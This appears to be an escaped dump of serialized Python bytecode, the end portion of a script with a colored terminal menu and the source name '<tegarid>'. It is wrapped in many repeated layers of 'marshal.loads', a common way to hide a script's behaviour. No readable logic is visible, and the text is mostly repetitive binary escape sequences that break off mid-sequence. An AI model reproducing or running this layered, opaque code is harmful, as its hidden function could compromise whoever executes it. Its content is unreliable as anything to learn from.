\x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d(\x01\x00\x00\x00R\x03\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x04\x00\x00\x00menuO\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x07\x07(\r\x00\x00\x00R\x04\x00\x00\x00R\n\x00\x00\x00R\x01\x00\x00\x00R\x17\x00\x00\x00R\x05\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00R\x06\x00\x00\x00R\x0f\x00\x00\x00R\x16\x00\x00\x00R\x14\x00\x00\x00R\x15\x00\x00\x00R\x1b\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x1c\x00\x00\x00\x0c\x01\x0c\x01\x0c\x01\x0c\x02\r\x01\t\x03\t\r\t\x05\t\x0b\t\x12\t\x0b\t\x0b\t\t\x07\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\